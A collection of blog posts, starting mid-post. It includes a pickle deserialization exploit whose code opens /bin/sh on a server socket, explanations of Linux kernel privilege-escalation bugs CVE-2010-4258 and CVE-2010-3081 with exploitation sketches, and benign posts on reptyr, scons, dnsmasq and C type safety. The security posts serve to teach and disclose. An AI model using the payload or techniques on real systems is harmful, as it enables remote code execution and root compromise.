At this point, we've basically won. We can run arbitrary shell commands on the target, and there are any number of ways we could bootstrap from here up to an interactive shell and whatever else we might want.

For completeness, I'll explain what I did, since it's a moderately cute trick. subprocess.Popen lets us select which file descriptors to attach to stdin, stdout, and stderr for the new process by passing integers for the stdin and similarly-named arguments, so we can open our /bin/sh on arbitrarily-numbered fd's.

However, as mentioned above, the target server uses Twisted, and it serves all requests in the same thread, using an asynchronous event-driven model. This means we can't necessarily predict which file descriptor on the server will correspond to our socket, since it depends on how many other clients are connected.

It also means, however, that every time we connect to the server, we'll open a new socket inside the same server process. So, let's guess that the server has fewer than, say, 20 concurrent connections at the moment. If we connect to the server's socket 20 times, that will open 20 new file descriptors in the server. Since they'll get assigned sequentially, one of them will almost certainly be fd 20. Then, we can generate a pickle like so, and send it over:

import cPickle
import subprocess
import base64

class Exploit(object):
  def __reduce__(self):
    fd = 20
    return (subprocess.Popen,
            (('/bin/sh',), # args
             0,            # bufsize
             None,         # executable
             fd, fd, fd))  # std{in,out,err}

print base64.b64encode(cPickle.dumps(Exploit()))

We'll open a /bin/sh on fd 20, which should be one of our 20 connections, and if all goes well, we'll see a prompt printed to one of those. We'll send some junk on that fd until we manage to get the original server to error out and close the connection, and we'll be left talking to /bin/sh over a socket. Game over.

In Conclusion

Again, nothing here should be novel, nor would I expect any of these pieces to take a competent hacker more than a few minutes to figure out, given the problem. But if this blog post teaches someone not to use pickle on untrusted data, then it will be worth it.

Reptyr: Changing a Process’s Controlling Terminal

reptyr (announced recently on this blog) takes a process that is currently running in one terminal, and transplants it to a new terminal. reptyr comes from a proud family of similar hacks, and works in the same basic way: We use ptrace(2) to attach to a target process and force it to execute code of our own choosing, in order to open the new terminal, and dup2(2) it over stdout and stderr.

The main special feature of reptyr is that it actually changes the controlling terminal of the target process. The "controlling terminal" is a concept maintained by UNIX operating systems that is independent of a process's file descriptors. The controlling terminal governs details like where ^C gets delivered, and how applications are notified of changes in window size.

Processes are grouped into two levels of hierarchical groups: sessions, and process groups. Each group is named by an ID, which is the PID of the initial leader (either "session leader" or "process group leader"). Even if the leader exits, that number is still the ID for the group. Sessions are used for terminal management – Every process in a session has the same controlling terminal, and each terminal belongs to at most one session. Process groups are a sub-division within sessions, and are used primarily for job control within the shell. For a more in-depth explanation, see part 3 of my earlier series on termios.

If you check out tty_ioctl(4), you'll find that Linux has an ioctl, TIOCSCTTY, that can be used to set the controlling terminal of a process, and you could be forgiven for thinking that all we need is to make the target call that ioctl, and we're done.

However, if we read closer, we find that it has several restrictions. In particular:

The calling process must be a session leader and not have a controlling terminal already. If this terminal is already the controlling terminal of a different session group then the ioctl fails with EPERM […]

In the typical case, where I'm trying to attach a (say) mutt that you spawned from your shell, mutt won't be a session leader – your shell will be the session leader, and mutt will be the process group leader for a process group containing only itself.

So, we need to make the target a session leader. Conveniently, there's a system call for that: setsid(2).

However, reading that man page, we find a new caveat: setsid(2) fails with EPERM if

The process group ID of any process equals the PID of the calling process. Thus, in particular, setsid() fails if the calling process is already a process group leader.

The shell creates a new process group for every job you launch, and so our target mutt will be a process group leader, and unable to setsid(). The usual solution for programs that want to setsid is to fork(), so that the child is still in the parent's session and process group, and then setsid() in the child. However, fork()ing our mutt and killing off the parent seems potentially disruptive, so let's see if we can avoid that.

So, we're going to need to change mutt's process group ID, so that there are no processes with process group IDs equal to its PID. Following some trusty SEE ALSO links, we get to setpgid(2). There's a bunch of text in that man page, but the key bit is:

If setpgid() is used to move a process from one process group to another, both process groups must be part of the same session (see setsid(2) and credentials(7)). In this case, the pgid specifies an existing process group to be joined and the session ID of that group must match the session ID of the joining process.

We need to find a process group in the same session as mutt to move our mutt into, and then we'll be able to setsid. We could try to find one – the shell is a plausible candidate, for instance – but there's an alternate, more direct route: Create one.

While we have mutt captured with ptrace, we can make it fork(2) a dummy child, and start tracing that child, too. We'll make the child setpgid to make it into its own process group, and then get mutt to setpgid itself into the child's process group. mutt can then setsid, moving into a new session, and now, as a session leader, we can finally ioctl(TIOCSCTTY) on the new terminal, and we win.
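
Ignoring the ptrace machinery and the parent/child synchronization, the sequence of calls we force the target to perform amounts to something like the following sketch. The function name and the pty path are placeholders of mine, not reptyr's actual code:

#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <unistd.h>

/* Sketch of the calls reptyr injects into the target; error handling and
 * synchronization between the two processes are omitted. */
static void steal_ctty(const char *new_tty)
{
    pid_t child = fork();
    if (child == 0) {
        setpgid(0, 0);          /* dummy child becomes its own process group */
        pause();                /* it only needs to exist for a moment */
        _exit(0);
    }
    setpgid(0, child);          /* join the child's process group, so we are */
    setsid();                   /* no longer a group leader and setsid() works */
    int fd = open(new_tty, O_RDWR);
    ioctl(fd, TIOCSCTTY, 0);    /* now allowed: acquire the new controlling tty */
}

In reptyr itself, each of these calls is executed from inside the target via ptrace, and the dummy child is traced as well, as described above.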

It turns out I didn't invent this technique – injcode and neercs work the same way. But I did discover it independently of them, and it was a fun little hunt through unix arcana.

Reptyr: Attach a Running Process to a New Terminal

Over the last week, I've written a nifty tool that I call reptyr. reptyr is a utility for taking an existing running program and attaching it to a new terminal. Started a long-running process over ssh, but have to leave and don't want to interrupt it? Just start a screen, use reptyr to grab it, and then kill the ssh session and head on home.

You can grab the source, or read on for some more details.

There's a shell script called screenify that's been going around the internet for nigh on 10 years now that is supposed to use gdb to accomplish the same thing. There's also a project called retty that tries to do the same thing, in C using ptrace() directly.

The difference between those programs and reptyr is that reptyr works much, much better.

If you attach a less using screenify or retty, it will still take input from the old terminal. If you attach an ncurses program, and resize the window, the program probably won't resize correctly. ^C and ^Z will still be processed on the old terminal – typing them in the new terminal won't do anything useful.

reptyr fixes all of these problems and more, and is the only such tool I know of that does so. I've never seen a program that doesn't behave noticeably incorrectly after attaching with retty or screenify, whereas with reptyr most programs I have tried work flawlessly.

How does it work?

reptyr works in the same basic way as screenify and retty – it attaches to the target process using the ptrace API, opens the new terminal, and dup2s it over the old file descriptors. It also copies the termios settings from the old terminal to the new terminal.

The main thing that reptyr does that no one else does is that it actually changes the controlling terminal of the process you are attaching. This is the detail that makes many things Just Work, including ^C and ^Z and window resizing.

Switching the target's controlling terminal is not easy and involves a fair bit of trickery with ptrace and Linux's terminal APIs. I will probably do another blog post some time about the dirty details of how I make this work, but for now you can check out attach.c if you really want to know.

reptyr still has a number of limitations – it doesn't generally work, for example, if the target process has any children. I know how to fix most of these problems, though, so expect it to get better with time. Please let me know if you find it useful!


(Edited to add:) Nothing is really new. A commenter on reddit pointed out that injcode and neercs both accomplish the same thing, even using the same trick to change the CTTY. Ah well, I had fun writing it anyways, and apparently I wasn't the only one who didn't know about the existing alternatives. neercs is a full screen replacement, though, and I think that reptyr should be more robust than injcode – I use a different technique for ptrace-hijacking, for example – and so hopefully this tool still has a niche as a more robust standalone utility. Certainly, judging from the amount of enthusiasm I've seen for this tool, this still isn't a problem that is solved to the average user's satisfaction.

Some Android Reverse-engineering Tools

I've spent a lot of time this last week staring at decompiled Dalvik assembly. In the process, I created a couple of useful tools that I figure are worth sharing.

I've been using dedexer instead of baksmali, honestly mainly because the former's output has fewer blank lines and so is more readable on my netbook's screen. Thus, these tools are designed to work with the output of dedexer, but the formats are simple enough that they should be easily portable to smali, if that's your tool of choice (And it does look like a better tool overall, from what I can see).


I'm an emacs junkie, and I can't stand it when I have to work with a file that doesn't have an emacs mode. So, a day into staring at un-highlighted .ddx files in fundamental-mode, I broke down and threw together ddx-mode. It's fairly minimal, but it provides functional syntax highlighting, and a little support for navigating between labels. One cute feature I threw in is that, if you move the point over a label, any other instances of that label get highlighted, which I found useful in keeping track of all the "lXXXXX" labels dedexer generates.


Dalvik assembly is, on the whole, pretty easy to read, but occasionally you stumble on huge methods that clearly originated from multiple nested loops and some horrible chained if statements. And what you'd really like is to be able to see the structure of the code, as much as the details of the instructions.

To that end, I threw together a Python script that "parses" .ddx files, and renders them to a control-flow graph using dot. As an example, the parseToken method from the IMAP parser in the k9mail application for Android looks like the following, when disassembled and rendered to a CFG:

I use the term "parses" because it's really just a pile of regexes, line.split() and line.startswith("..."), but it gets the job done, so I hope it might be of use to someone else. The biggest missing feature is that it doesn't parse catch directives, so those just end up floating out to the side as unattached blocks.

You'll also notice the rounded "return" blocks – either javac or dx merges all exits from a function to go through the same return block, but I found that preserving that feature in the CFG produces a lot of clutter and makes it hard to read, so I lift every edge that would go to that common block to go to a separate block.


Both tools live in my "reverse-android" repository on github, and are released under the MIT license. Please feel free to do whatever you want with them, although I'd appreciate it if you let me know if you make any improvements or find them useful.

CVE-2010-4258: Turning Denial-of-service Into Privilege Escalation

Dan Rosenberg recently released a privilege escalation bug for Linux, based on three different kernel vulnerabilities I reported recently. This post is about CVE-2010-4258, the most interesting of them, and, as Dan writes, the reason he wrote the exploit in the first place. In it, I'm going to do a brief tour of the various kernel features that collided to make this bug possible, and explain how they combine to turn an otherwise-boring oops into privilege escalation.


When a user application passes a pointer to the kernel, and the kernel wants to read or write from that pointer, the kernel needs to perform various checks that a buggy or malicious userspace app hasn't passed an "evil" pointer.

Because the kernel and userspace run in the same address space, the most important check is simply that the pointer points into the "userspace" part of the address space. User applications are protected by page table permissions from writing into kernel memory, but the kernel isn't, and so must explicitly check that any pointers given to it by a user don't point into the kernel region.

The address space is laid out such that user applications get the bottom portion, and the kernel gets the top, so this check is a simple comparison against that boundary. The kernel function that performs this check is called access_ok, although there are various other functions that do the same check, implicitly or otherwise.

get_fs() and set_fs()

Occasionally, however, the kernel finds it useful to change the rules for what access_ok will allow. set_fs()1 is an internal Linux function that is used to override the definition of the user/kernel split, for the current process.

After a set_fs(KERNEL_DS), no checking is performed that user pointers point to userspace – access_ok will always return true. set_fs(KERNEL_DS) is mainly used to enable the kernel to wrap functions that expect user pointers, by passing them pointers into the kernel address space. A typical use reads something like this:

old_fs = get_fs(); set_fs(KERNEL_DS);
vfs_readv(file, kernel_buffer, len, &pos);
set_fs(old_fs);

vfs_readv expects a user-provided pointer, so without the set_fs(), the access_ok() inside vfs_readv() would fail on our kernel buffer, so we use set_fs() to effectively temporarily disable that checking.

Kernel oopses

When the kernel oopses, perhaps because of a NULL pointer dereference in kernelspace, or because of a call to the BUG() macro to indicate an assertion failure, the kernel attempts to clean up, and then tries to kill the current process by calling the do_exit() function.

When the kernel does so, it's still running in the same process context it was before the oops occurred, including any set_fs() override, if applicable. Which means that do_exit will get called with access_ok disabled – not something anyone expected when they wrote the individual pieces of this system.


As it turns out, do_exit contains a write to a user-controlled address that expects access_ok to be working properly!

clear_child_tid is a feature where, on thread exit, the kernel can be made to write a zero into a specified address in that thread's address space, in order to notify other threads of that exit.
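
Userspace chooses where that pointer goes: it is set via clone()'s CLONE_CHILD_CLEARTID flag, or directly with the set_tid_address(2) syscall. A quick sketch:

#include <sys/syscall.h>
#include <unistd.h>

int main(void)
{
    static int tid_slot;
    /* Normally glibc points this at its own thread bookkeeping; here we pick
     * the address ourselves.  On exit, the kernel does put_user(0, &tid_slot). */
    syscall(SYS_set_tid_address, &tid_slot);
    return 0;
}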

This is implemented by simply storing a pointer to the to-be-zeroed address inside struct task_struct (which represents a single thread or process), and, on exit, mm_release, called from do_exit, does:

put_user(0, tsk->clear_child_tid);

This is normally safe, because put_user checks that its second argument falls into the "userspace" segment before doing a write. But, if we are running with get_fs() == KERNEL_DS, it will happily accept any address at all, even one pointing into kernel space.

So, if we find any kernel BUG() or NULL dereference, or other page fault, that we can trigger after a set_fs(KERNEL_DS), we can trick the kernel into a user-controlled write into kernel memory!

splice() et al.

An obvious question at this point is: How much of the kernel can an attacker cause to run with get_fs() == KERNEL_DS?

There are a number of small special cases. For example, the binary sysctl compatibility code works by calling the normal /proc/ write handlers from kernelspace, under set_fs(). A handful of compat-mode (32-on-64) syscalls work similarly.

By far the biggest source I've found, however, is the splice() system call. The splice() system call is a relatively recent addition to Linux, and allows for zero-copy transfer of pages between a pipe and another file descriptor.

As of 2.6.31, an attempt to splice() to or from an fd that doesn't have special zero-copy splice() support will fall back on doing an ordinary read(), write(), or sendmsg() on the fd … from the kernel, using set_fs() in order to pass in kernel buffers.

What that means is that by using splice(), an attacker can call the bulk of the code in most obscure filesystems and socket types (which tend not to have explicit splice() support) with a segment override in place. Conveniently for an attacker, that is also exactly a description of where the bulk of the random security bugs tend to be.
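
In outline, driving such code from userspace looks something like this sketch, where sock stands in for a socket of whatever obscure family contains the bug you want to trigger, and the helper name is mine:

#define _GNU_SOURCE
#include <fcntl.h>
#include <unistd.h>

/* Sketch: feed data into a protocol's send path via splice(), so that the
 * fallback write/sendmsg runs under set_fs(KERNEL_DS). */
static void poke_via_splice(int sock, const char *buf, size_t len)
{
    int p[2];
    pipe(p);
    write(p[1], buf, len);                   /* stage the payload in a pipe */
    splice(p[0], NULL, sock, NULL, len, 0);  /* kernel falls back to an
                                                ordinary send, under KERNEL_DS */
}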

This is also exactly the technique Dan's exploit uses. He uses CVE-2010-3849, an otherwise boring NULL pointer dereference I reported in the Econet network protocol. His exploit code does a splice() to an econet socket, causing the econet_sendmsg handler to get called under set_fs(KERNEL_DS). When it oopses, do_exit is called, and he gets a user-controlled write into kernel memory. Everything else is just details.


1 Back in Linux 1.x, this function actually set the %fs register on i386. It hasn’t in years, but it’s used in too many places for changing the name to be worth it.

Some Notes on CVE-2010-3081 Exploitability

Most of you reading this blog probably remember CVE-2010-3081. The bug got an awful lot of publicity when it was discovered and announced, due to allowing local privilege escalation against virtually all 64-bit Linux kernels in common use at the time.

While investigating CVE-2010-3081, I discovered that several of the commonly-believed facts about the CVE were wrong, and it was even more broadly exploitable than was publicly documented. I'd like to share those observations here.

A brief review of the bug

The bug arose from the compat_alloc_user_space function in Linux's 32-bit compatibility support on 64-bit systems. compat_alloc_user_space allocates and returns space on the userspace stack for the kernel to use:

static inline void __user *compat_alloc_user_space(long len)
{
    struct pt_regs *regs = task_pt_regs(current);
    return (void __user *)regs->sp - len;
}

This function is only called by compat-mode syscalls, so current is assumed to be a 32-bit process, in which case regs->sp, the user stack pointer, will be a 32-bit quantity. Thus, if we subtract a small len, the result should still fit in 32 bits, which, on a 64-bit system, means it is guaranteed to fall within the user address space.

Because of this, some callers of compat_alloc_user_space were lazy, and did not call access_ok (or a function which called access_ok) to check that the result of compat_alloc_user_space fell within the user address space.

However, it turned out that some call sites in the kernel called compat_alloc_user_space with a user-controlled len value, allowing the subtraction to wrap around. On a 64-bit system, the kernel lives in the top four gigabytes of memory, and so this wraparound is enough for a user to cause compat_alloc_user_space to return a pointer into the kernel's address space.

Moreover, it turned out that the functions that used a user-controlled len also did not check access_ok on the result of the allocation. In particular, Linux 2.6.26 introduced the compat_mc_getsockopt function, which called compat_alloc_user_space with a user-controlled length and then copied user-controlled data to this pointer. It is this function which the public exploit targeted.

Disabling 32-bit binaries doesn't help

When an exploit was released for this bug, many sources circulated a mitigation: Disable 32-bit binaries on a system. Prevent compat-mode processes from running, the logic goes, and you prevent anyone from making a compat-mode syscall that triggers the vulnerable path.

This mitigation indeed prevented the public exploit from working (it included 32-bit inline assembly, and so couldn't even easily be recompiled as a 64-bit binary), and many observers seemed to believe it closed the bug entirely.

However, this was not the case! It turns out, on an amd64 system, a 64-bit process can still make a compat-mode system call using the int $0x80 instruction, which is the traditional 32-bit syscall mechanism! Even though the process is running in 64-bit mode, int $0x80 redirects to the compat-mode syscall table.
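
To see this concretely, here is a sketch of making a compat-mode syscall from a 64-bit binary; 20 is getpid's number in the 32-bit syscall table:

#include <stdio.h>

int main(void)
{
    long ret;
    /* int $0x80 dispatches to the 32-bit (compat) syscall table, even from
     * a 64-bit process; the syscall number goes in eax. */
    asm volatile("int $0x80" : "=a"(ret) : "a"(20L));
    printf("compat getpid() returned %ld\n", ret);
    return 0;
}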

After realizing this, modifying the public exploit to work when compiled in 64-bit mode was a simple matter of porting the inline assembly, and changing a small handful of types. I've posted the modified exploit and the diff against the original for the curious.

The integer overflow is totally irrelevant

Once you've realized that you can make compat-mode system calls from a 64-bit process, a little bit of thought reveals something else interesting. compat_alloc_user_space subtracts the len value off of the userspace stack pointer. Previously, we relied on subtracting a large value from a 32-bit stack pointer in order to end up with a kernel pointer. However, while a 32-bit process is limited to a 32-bit stack pointer, a 64-bit process can write a full 64-bit value into %rsp, and thus regs->sp! There's no need for underflow at all – you can just write a 64-bit value into %rsp and do an int $0x80, and make compat_alloc_user_space return any value you please!

The condition for exploitability thus drops from "user-controlled len and no access_ok" to simply "no access_ok".

This is interesting, because it turns out that some very old kernels, before 2.6.11, including RHEL 4, have the following function:

int siocdevprivate_ioctl(unsigned int fd, unsigned int cmd, unsigned long arg)
{
        struct ifreq __user *u_ifreq64;

        u_ifreq64 = compat_alloc_user_space(sizeof(*u_ifreq64));

        /* Don't check these user accesses, just let that get trapped
         * in the ioctl handler instead.
         */
        copy_to_user(&u_ifreq64->ifr_ifrn.ifrn_name[0], &tmp_buf[0], IFNAMSIZ);
        __put_user(data64, &u_ifreq64->ifr_ifru.ifru_data);

        return sys_ioctl(fd, cmd, (unsigned long) u_ifreq64);
}
Remember, we can make compat_alloc_user_space return an arbitrary value. The copy_to_user will call access_ok and fail, but that return value will be discarded, and the __put_user will scribble 32 bits of user-controlled data at a user-controlled address. Bingo, local root.

It turns out this function was present in Linux 2.4.x, too, meaning that this exploit even affected RHEL3 and anyone else still running a 2.4-based system!

Based on these observations, I've produced a working proof-of-concept exploit for RHEL4, derived from the released exploit for RHEL5. Contact me if you're interested, but it's pretty straightforward.

Closing notes

As far as I know, neither of these facts has been publicly documented prior to this post. I shared this information with Red Hat, and they requested I keep it private until they released fixes for RHEL 3, which happened last week. I would not be at all surprised to learn that someone else has private exploits that incorporate either or both of these observations, though.

One important moral here is you must be very careful when declaring a system unaffected by a vulnerability, or declaring a mitigation to be complete. Software systems have gotten tremendously complex, and it's often impossible to be totally confident you understand every last way an attacker could tickle a vulnerability.

Why Scons Is Cool

I've recently started playing with scons a little for some small personal projects. It's not perfect, but I've rapidly come to the conclusion that it's probably a far better choice than make in many cases. The main exceptions would be cases where you need to integrate into legacy build systems, or if asking or expecting developers to have scons installed is unreasonable for some reason.

The main reason that scons is cool to me, and the thing that makes it fundamentally different from make, is the introduction of actual scoping.

make has a single global scope. This is one of the main reasons that people write recursive Makefiles; By giving you one file per directory, you get one scope per directory, which makes it possible to have per-directory pattern rules, variables, and all that other stuff, without driving yourself insane.

make's awful syntax, confusing varieties of variable, whitespace-sensitivity, and all the other things that people love to bitch about are annoying, but to my mind, the single scope that makes recursive Makefiles the dominant (and, really, the only scalable) paradigm is the one thing that really sucks.

scons solves this by baking various kinds of scoping into the tool. scons lets you include sub-build-scripts (typically named SConscript, by convention). Those scripts run in their own namespace and can establish their own variables, rules, etc., but the end result is then merged back into the global rule list (handling sub-directory paths intelligently), so that the scheduler can work globally, instead of having to recurse.

Furthermore, because of this explicit scoping, you can pass variables, including targets, between build files, letting you explicitly set up cross-directory dependencies or share CFLAGS or other variables, making it easy for different directories to share exactly as much or as little configuration as you want.

In addition, scons has the concept of "build environments", which are objects that include build rules, variables, and so on. By reifying what make just represents as the global environment into objects, it makes it much easier to scope and program things. For example, if you have a set of targets that should be built using the global default rules, except with debugging enabled, you can do:

myenv = env.Clone()
myenv.Append(CFLAGS = ['-g'])

By making it (optionally) explicit which sets of rules and variables are being used in each place, it becomes much easier to share multiple kinds of targets and rule sets in a single file, without necessitating lots of sub-files just for scoping, like make tends to lead to.

scons is cool for a bunch of reasons. It eliminates most of the stupid little annoyances you've probably had with make. But, in my mind, this is the thing that makes it cool. They've added sane scoping to the build tool, so that you can construct non-recursive build systems without going insane.

I'll definitely be considering scons for any new projects I write going forward. I hate make, and this definitely feels like a path forward.

Configuring Dnsmasq With VMware Workstation

I love VMware workstation. I keep VMs around for basically every version of every major Linux distribution, and use them heavily for all kinds of kernel testing and development.

This post is a quick writeup of my networking setup with VMware Workstation, using dnsmasq to assign my VMs addresses and provide a DNS server to resolve VM addresses.

The objective

I want to be able to resolve my VMs' hostnames so that I can ssh to them, or run other network services and access them from the host. I could just assign static addresses and put them in /etc/hosts, but that's totally lame, and liable to be a source of error and frustration, because I have dozens of VMs, and add and remove them frequently.

We're going to set things up so that when VMs get addresses from DHCP, their hostnames automatically become resolvable, using the .vmware domain. To do this, we're going to set up a piece of software called dnsmasq, which is a flexible DNS and DHCP server, designed for basically exactly this purpose.

The setup

Because I use my VMs for local testing, I just keep most of them on a local NAT on my machine. I configure that virtual network inside VMware as follows (run vmware-netconfig, or follow the appropriate menus):

Note how I disable "Use local DHCP service to distribute IP addresses to VMs" – we're going to set up dnsmasq to provide DHCP, so we don't want it fighting with VMware's.

Notice that the subnet I'm using here is 172.16.37.* – if you choose a different one, you'll need to adjust accordingly later.

Configuring dnsmasq

Then, I install dnsmasq, and configure /etc/dnsmasq.conf as follows:

interface=lo
interface=vmnet8
no-dhcp-interface=lo

server=<your upstream DNS server>
local=/vmware/

no-resolv
no-hosts

domain=vmware

dhcp-range=172.16.37.3,172.16.37.200
dhcp-authoritative

dhcp-option=option:router,172.16.37.2
Here's what each of those lines means, in order:

interface=lo
interface=vmnet8
no-dhcp-interface=lo

We don't want dnsmasq serving DHCP or DNS to the outside world or other virtual networks, so we only tell it to listen on the local interface – so that we can talk to it from the host – and to the virtual network we set up in the previous step. We don't want it serving DHCP to localhost, though, so we tell it not to.

server=<your upstream DNS server>
local=/vmware/

Here we tell dnsmasq how to forward DNS requests to the outside world. We're going to be using dnsmasq as our primary nameserver, and having it forward requests for things it doesn't understand to a real DNS server. In my case, that's my LAN's router. The local line tells dnsmasq that the .vmware domain is local, and it should never forward requests to resolve things in that domain.

If I needed something more complicated, it might be possible to use the resolv-file option or similar, but I don't, personally.

no-resolv
no-hosts

These options tell dnsmasq not to look at resolv.conf or /etc/hosts when resolving names – we want it only to resolve VMs itself, and to forward everything else.

domain=vmware

This tells dnsmasq to assign the .vmware domain to hosts it hands out DHCP to, so that we can resolve VMs in the .vmware domain.

dhcp-range=172.16.37.3,172.16.37.200
dhcp-authoritative

And finally, we configure the DHCP server. We give it a range of addresses to assign on the subnet we created earlier. I stop at .200, so that I can leave the last few open for static IPs if I need them for some reason, and we start at .3: .1 is the host, and .2 is the address of VMware's router. dhcp-authoritative enables some optimizations when dnsmasq knows it is the only DHCP server around.

dhcp-option=option:router,172.16.37.2

Finally, we need dhcp-option to tell DHCP clients to use the VMware-provided router at .2 as their gateway, instead of using the host, at .1. We could configure the host to be a NAT server using Linux's NAT, but that's outside the scope of this document.

Configuring the host

Now, we need to configure the host to use dnsmasq as our DNS server. This is a simple matter of telling the host to use 127.0.0.1 (the local dnsmasq) as our DNS server, and to add .vmware to our search path. If we're editing resolv.conf directly, it would look like:

nameserver 127.0.0.1
search vmware

Configuring guests

We need to configure our guests to send a hostname along with their DHCP requests, so that dnsmasq can add them to its address table. How to do this varies by OS, but most modern OSes do it automatically. If they don't, here are a few hints:

For RHEL-based distros, edit /etc/sysconfig/network-scripts/ifcfg-INTERFACE, and add a line like

DHCP_HOSTNAME=centos-5-amd64

For most other Linux distributions, you can often edit dhclient.conf (usually in /etc/ or /etc/dhclient/) to include:

 send host-name "centos-5-amd64";

Or, with a recent dhclient,

 send host-name "<hostname>";

will make it look up the machine's actual hostname.


That's all there is to it. This is a pretty simple setup, but hopefully someone else will find this useful. If you need dnsmasq to do something more subtle, the documentation is mostly quite good.

Using Haskell’s ‘Newtype’ in C

A common problem in software engineering is avoiding confusion and errors when dealing with multiple types of data that share the same representation. Classic examples include differentiating between measurements stored in different units, distinguishing between a string of HTML and a string of plain text (one of these needs to be encoded before it can safely be included in a web page!), or keeping track of pointers to physical memory or virtual memory when writing the lower layers of an operating system's memory management.

Unless we're using a richly-typed language like Haskell, where we can use newtype, the best solutions tend to just rely on convention. The much-maligned Hungarian Notation evolved in part to try to combat this sort of problem – If you decide on a convention that variables representing physical addresses start with pa and virtual addresses start with va, then anyone who encounters a uintptr_t pa_bootstack; can immediately decode the intent.

It turns out, though, that we can get something very much like newtype in familiar old C. Suppose we're writing some of the paging code for a toy x86 architecture. We're going to be passing around a lot of physical and virtual addresses, as well as indexes of pages in RAM, and it's going to be easy to confuse them all. The traditional solution is to use some typedefs, and then promise to be very careful not to mix them up:

typedef uint32_t physaddr_t;
typedef uint32_t virtaddr_t;
typedef uint32_t ppn_t;

We have to promise not to mess up, though – the compiler isn't going to notice if I pass a ppn_t to a function that wanted a physaddr_t.

This example was inspired by JOS, a toy operating system used by MIT's Operating Systems Engineering class. JOS remaps all of physical memory starting at a specific virtual memory address (KERNBASE), and so provides the following macros:

/* This macro takes a kernel virtual address -- an address that points above
 * KERNBASE, where the machine's maximum 256MB of physical memory is mapped --
 * and returns the corresponding physical address.  It panics if you pass it a
 * non-kernel virtual address.
 */
#define PADDR(kva)                                          \
({                                                          \
        physaddr_t __m_kva = (physaddr_t) (kva);            \
        if (__m_kva < KERNBASE)                                     \
                panic("PADDR called with invalid kva %08lx", __m_kva);\
        __m_kva - KERNBASE;                                 \
})

/* This macro takes a physical address and returns the corresponding kernel
 * virtual address.  It panics if you pass an invalid physical address. */
#define KADDR(pa)                                           \
({                                                          \
        physaddr_t __m_pa = (pa);                           \
        uint32_t __m_ppn = PPN(__m_pa);                             \
        if (__m_ppn >= npage)                                       \
                panic("KADDR called with invalid pa %08lx", __m_pa);\
        (void*) (__m_pa + KERNBASE);                                \
})

Because the typedefs are unchecked by the compiler, though, it is a common mistake to use a physical address where a virtual address is meant, and nothing will catch it until your kernel triple-faults, and a long, painful debugging session ensues.

Inspired by Haskell's newtype, though, it turns out we can get the compiler to check it for us, with a little more work, by using a singleton struct instead of a typedef:

typedef struct { uint32_t val; } physaddr_t;

If we wanted to be overly cute, we could even use a macro to mimic Haskell's newtype:

#define NEWTYPE(tag, repr)                  \
    typedef struct { repr val; } tag;       \
    static inline tag make_##tag(repr v) {  \
            return (tag){.val = v};         \
    }                                       \
    static inline repr tag##_val(tag v) {   \
            return v.val;                   \
    }

NEWTYPE(physaddr, uint32_t);
NEWTYPE(virtaddr, uint32_t);
NEWTYPE(ppn,  uint32_t);

Given those definitions, PADDR and KADDR become:

#define PADDR(kva)                                          \
({                                                          \
    if (virtaddr_val(kva) < KERNBASE)                       \
            panic("PADDR called with invalid kva %08lx", virtaddr_val(kva)); \
    make_physaddr(virtaddr_val(kva) - KERNBASE);            \
})

#define KADDR(pa)                                           \
({                                                          \
    uint32_t __m_ppn = physaddr_val(pa) >> PTXSHIFT;        \
    if (__m_ppn >= npage)                                   \
            panic("KADDR called with invalid pa %08lx", physaddr_val(pa)); \
    make_virtaddr(physaddr_val(pa) + KERNBASE);             \
})

We have to use some accessor and constructor functions, but in exchange, we get strong type-checking: If you pass PADDR a physical address (or anything other than a virtual address), the compiler will catch it.

The wrapping and unwrapping is slightly annoying, but we can for the most part avoid having to do it everywhere, by pushing the wrapping and unwrapping down into some utility functions. For instance, a relatively common operation at this point in JOS is creating a page-table entry, given a physical address. If you want to construct the PTE by hand, you need to use physaddr_val every time. But a better plan is a simple utility function:

 static inline pte_t make_pte(physaddr addr, int perms) {
     return physaddr_val(addr) | perms;
 }

In addition to losing the need to unwrap the physaddr everywhere, we gain a measure of clarity and typechecking – if you remember to use make_pte, you'll never accidentally try to insert a virtual address into a page table.

We can add similar functions for converting between types, as well as a struct Page, used to track metadata for a physical page. As an experiment, I went and reimplemented JOS's memory management primitives using these definitions, and only needed to use FOO_val or make_FOO a very few times outside of the header files that defined KADDR and friends.
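
For example, the page conversions could look something like the following sketch, which assumes JOS-style names (the pages array of struct Page, and PGSHIFT) from the surrounding kernel:

/* Sketch: conversions between struct Page and the wrapped address types. */
static inline physaddr page2pa(struct Page *pp) {
    return make_physaddr((pp - pages) << PGSHIFT);
}

static inline struct Page *pa2page(physaddr pa) {
    return &pages[physaddr_val(pa) >> PGSHIFT];
}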


While the typechecking is nice, any C programmer implementing a memory-management system is probably going to want to know: How much does it cost me? You're creating and unpacking these singleton structs everywhere – does that have a cost?

The answer, in almost all cases, is "no": a half-decent compiler will optimize the resulting code to be completely identical to the code without the structs.
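
If you want to convince yourself, one quick experiment is to compile a pair of functions like these with optimization enabled (say, gcc -O2) and diff the generated assembly; in my experience they come out identical:

/* Two spellings of the same computation; an optimizing compiler should
 * emit the same code for both. */
uint32_t to_kva_raw(uint32_t pa) {
        return pa + KERNBASE;
}

uint32_t to_kva_typed(physaddr pa) {
        return physaddr_val(pa) + KERNBASE;
}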

Also, the in-memory representation of the struct is going to be exactly the same as the bare value – it's even guaranteed to have the same alignment and padding constraints, so if you need to embed a physaddr inside another struct, or into an array, the representation is identical to the physaddr_t typedef.
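
These properties are also cheap to check at build time. A sketch, assuming a compiler that supports C11's _Static_assert (any homegrown compile-time assert macro would do just as well):

#include <stddef.h>     /* offsetof */

_Static_assert(sizeof(physaddr) == sizeof(uint32_t),
               "wrapper must be the same size as the bare type");
_Static_assert(_Alignof(physaddr) == _Alignof(uint32_t),
               "wrapper must have the same alignment as the bare type");
_Static_assert(offsetof(physaddr, val) == 0,
               "no padding before the initial member");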

On i386, parameters are passed on the stack, so passing the struct is identical to passing the bare uint32_t. On amd64, as described last week, small structures are passed in registers, and so, again, the calling convention is identical.

Unfortunately, the i386 ABI specifies that returned structs always go on the stack (while integers go in %eax), so you do pay slightly if you want to return one of these typedef'd objects. amd64 will also break it down into a register, though, so on a 64-bit machine it's again identical.

If you're worried, though, you can always use the preprocessor to make the checks vanish for a production build:

#ifdef NDEBUG
#define NEWTYPE(tag, repr)                  \
    typedef repr tag;                       \
    static inline tag make_##tag(repr v) {  \
            return v;                       \
    }                                       \
    static inline repr tag##_val(tag v) {   \
            return v;                       \
    }
#else
/* Same struct-based definition as above */
#endif

